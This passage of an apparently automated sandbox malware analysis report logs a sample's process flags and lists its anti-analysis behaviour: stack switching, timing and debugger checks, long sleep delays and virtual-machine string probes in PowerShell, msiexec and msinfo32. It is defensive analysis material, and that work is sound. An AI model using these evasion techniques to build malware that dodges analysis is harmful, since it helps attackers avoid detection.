          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\msinfo32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\msinfo32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\msinfo32.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\msinfo32.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\msinfo32.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\msinfo32.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\msinfo32.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior

          Malware Analysis System Evasion

          barindex
          Switches to a custom stack to bypass stack traces
          Source: C:\Windows\SysWOW64\msinfo32.exeAPI/Special instruction interceptor: Address: 7FFE2220D324
          Source: C:\Windows\SysWOW64\msinfo32.exeAPI/Special instruction interceptor: Address: 7FFE2220D7E4
          Source: C:\Windows\SysWOW64\msinfo32.exeAPI/Special instruction interceptor: Address: 7FFE2220D944
          Source: C:\Windows\SysWOW64\msinfo32.exeAPI/Special instruction interceptor: Address: 7FFE2220D504
          Source: C:\Windows\SysWOW64\msinfo32.exeAPI/Special instruction interceptor: Address: 7FFE2220D544
          Source: C:\Windows\SysWOW64\msinfo32.exeAPI/Special instruction interceptor: Address: 7FFE2220D1E4
          Source: C:\Windows\SysWOW64\msinfo32.exeAPI/Special instruction interceptor: Address: 7FFE22210154
          Source: C:\Windows\SysWOW64\msinfo32.exeAPI/Special instruction interceptor: Address: 7FFE2220DA44
          Source: C:\Windows\SysWOW64\msinfo32.exeCode function: 13_2_04F0096E rdtsc 13_2_04F0096E
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
          Source: C:\Windows\System32\wscript.exeWindow found: window name: WSH-TimerJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 4731Jump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 5199Jump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 6607Jump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 3218Jump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exeAPI coverage: 0.8 %
          Source: C:\Windows\SysWOW64\msinfo32.exeAPI coverage: 2.9 %
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 5776Thread sleep time: -4611686018427385s >= -30000sJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 6588Thread sleep time: -2767011611056431s >= -30000sJump to behavior
          Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
          Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
          Source: C:\Windows\SysWOW64\msinfo32.exeLast function: Thread delayed
          Source: C:\Windows\SysWOW64\msinfo32.exeCode function: 13_2_02ECC110 FindFirstFileW,FindNextFileW,FindClose,13_2_02ECC110
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
          Source: msiexec.exe, 0000000B.00000002.2530755175.0000000008CA8000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW8
          Source: msiexec.exe, 0000000B.00000002.2530929438.0000000008CD9000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 0000000B.00000003.2400330644.0000000008CD9000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW
          Source: powershell.exe, 00000004.00000002.1873201278.0000020AFB90A000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAWI
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information queried: ProcessInformationJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess queried: DebugPortJump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exeProcess queried: DebugPortJump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exeProcess queried: DebugPortJump to behavior
          Source: C:\Windows\SysWOW64\msinfo32.exeProcess queried: DebugPortJump to behavior
          Source: C:\Windows\SysWOW64\msinfo32.exeCode function: 13_2_04F0096E rdtsc 13_2_04F0096E
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 6_2_02DAD6E0 LdrInitializeThunk,LdrInitializeThunk,LdrInitializeThunk,6_2_02DAD6E0
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 11_2_24859486 mov eax, dword ptr fs:[00000030h]11_2_24859486
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 11_2_24859486 mov eax, dword ptr fs:[00000030h]11_2_24859486
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 11_2_2484B480 mov eax, dword ptr fs:[00000030h]11_2_2484B480
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 11_2_248564AB mov eax, dword ptr fs:[00000030h]11_2_248564AB
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 11_2_248834B0 mov eax, dword ptr fs:[00000030h]11_2_248834B0
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 11_2_248844B0 mov ecx, dword ptr fs:[00000030h]11_2_248844B0
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 11_2_248DA4B0 mov eax, dword ptr fs:[00000030h]11_2_248DA4B0
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 11_2_249254DB mov eax, dword ptr fs:[00000030h]11_2_249254DB
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 11_2_248504E5 mov ecx, dword ptr fs:[00000030h]11_2_248504E5
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 11_2_248F94E0 mov eax, dword ptr fs:[00000030h]11_2_248F94E0
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 11_2_2487340D mov eax, dword ptr fs:[00000030h]11_2_2487340D
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 11_2_24888402 mov eax, dword ptr fs:[00000030h]11_2_24888402
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 11_2_24888402 mov eax, dword ptr fs:[00000030h]11_2_24888402
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 11_2_24888402 mov eax, dword ptr fs:[00000030h]11_2_24888402
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 11_2_248D7410 mov eax, dword ptr fs:[00000030h]11_2_248D7410
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 11_2_2484C427 mov eax, dword ptr fs:[00000030h]11_2_2484C427
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 11_2_2484E420 mov eax, dword ptr fs:[00000030h]11_2_2484E420
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 11_2_2484E420 mov eax, dword ptr fs:[00000030h]11_2_2484E420
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 11_2_2484E420 mov eax, dword ptr fs:[00000030h]11_2_2484E420
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 11_2_248D6420 mov eax, dword ptr fs:[00000030h]11_2_248D6420
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 11_2_248D6420 mov eax, dword ptr fs:[00000030h]11_2_248D6420
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 11_2_248D6420 mov eax, dword ptr fs:[00000030h]11_2_248D6420
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 11_2_248D6420 mov eax, dword ptr fs:[00000030h]11_2_248D6420
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 11_2_248D6420 mov eax, dword ptr fs:[00000030h]11_2_248D6420
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 11_2_248D6420 mov eax, dword ptr fs:[00000030h]11_2_248D6420
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 11_2_248D6420 mov eax, dword ptr fs:[00000030h]11_2_248D6420
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 11_2_2490F453 mov eax, dword ptr fs:[00000030h]11_2_2490F453
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 11_2_2485B440 mov eax, dword ptr fs:[00000030h]11_2_2485B440
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 11_2_2485B440 mov eax, dword ptr fs:[00000030h]11_2_2485B440
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 11_2_2485B440 mov eax, dword ptr fs:[00000030h]11_2_2485B440
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 11_2_2485B440 mov eax, dword ptr fs:[00000030h]11_2_2485B440
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 11_2_2485B440 mov eax, dword ptr fs:[00000030h]11_2_2485B440
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 11_2_2485B440 mov eax, dword ptr fs:[00000030h]11_2_2485B440
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 11_2_2488E443 mov eax, dword ptr fs:[00000030h]11_2_2488E443
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 11_2_2488E443 mov eax, dword ptr fs:[00000030h]11_2_2488E443
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 11_2_2488E443 mov eax, dword ptr fs:[00000030h]11_2_2488E443
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 11_2_2488E443 mov eax, dword ptr fs:[00000030h]11_2_2488E443
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 11_2_2488E443 mov eax, dword ptr fs:[00000030h]11_2_2488E443
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 11_2_2488E443 mov eax, dword ptr fs:[00000030h]11_2_2488E443
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 11_2_2488E443 mov eax, dword ptr fs:[00000030h]11_2_2488E443
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 11_2_2488E443 mov eax, dword ptr fs:[00000030h]11_2_2488E443
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 11_2_2484645D mov eax, dword ptr fs:[00000030h]11_2_2484645D
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 11_2_2487245A mov eax, dword ptr fs:[00000030h]11_2_2487245A
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 11_2_24851460 mov eax, dword ptr fs:[00000030h]11_2_24851460
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 11_2_24851460 mov eax, dword ptr fs:[00000030h]11_2_24851460
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 11_2_24851460 mov eax, dword ptr fs:[00000030h]11_2_24851460
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 11_2_24851460 mov eax, dword ptr fs:[00000030h]11_2_24851460
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 11_2_24851460 mov eax, dword ptr fs:[00000030h]11_2_24851460
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 11_2_2486F460 mov eax, dword ptr fs:[00000030h]11_2_2486F460
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 11_2_2486F460 mov eax, dword ptr fs:[00000030h]11_2_2486F460
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 11_2_2486F460 mov eax, dword ptr fs:[00000030h]11_2_2486F460
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 11_2_2486F460 mov eax, dword ptr fs:[00000030h]11_2_2486F460
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 11_2_2486F460 mov eax, dword ptr fs:[00000030h]11_2_2486F460
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 11_2_2486F460 mov eax, dword ptr fs:[00000030h]11_2_2486F460
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 11_2_2492547F mov eax, dword ptr fs:[00000030h]11_2_2492547F
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 11_2_248DC460 mov ecx, dword ptr fs:[00000030h]11_2_248DC460
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 11_2_2487A470 mov eax, dword ptr fs:[00000030h]11_2_2487A470
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 11_2_2487A470 mov eax, dword ptr fs:[00000030h]11_2_2487A470
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 11_2_2487A470 mov eax, dword ptr fs:[00000030h]11_2_2487A470
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 11_2_24884588 mov eax, dword ptr fs:[00000030h]11_2_24884588
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 11_2_24852582 mov eax, dword ptr fs:[00000030h]11_2_24852582
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 11_2_24852582 mov ecx, dword ptr fs:[00000030h]11_2_24852582
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 11_2_2484758F mov eax, dword ptr fs:[00000030h]11_2_2484758F
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 11_2_2484758F mov eax, dword ptr fs:[00000030h]11_2_2484758F
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 11_2_2484758F mov eax, dword ptr fs:[00000030h]11_2_2484758F
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 11_2_2488E59C mov eax, dword ptr fs:[00000030h]11_2_2488E59C
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 11_2_248DB594 mov eax, dword ptr fs:[00000030h]11_2_248DB594
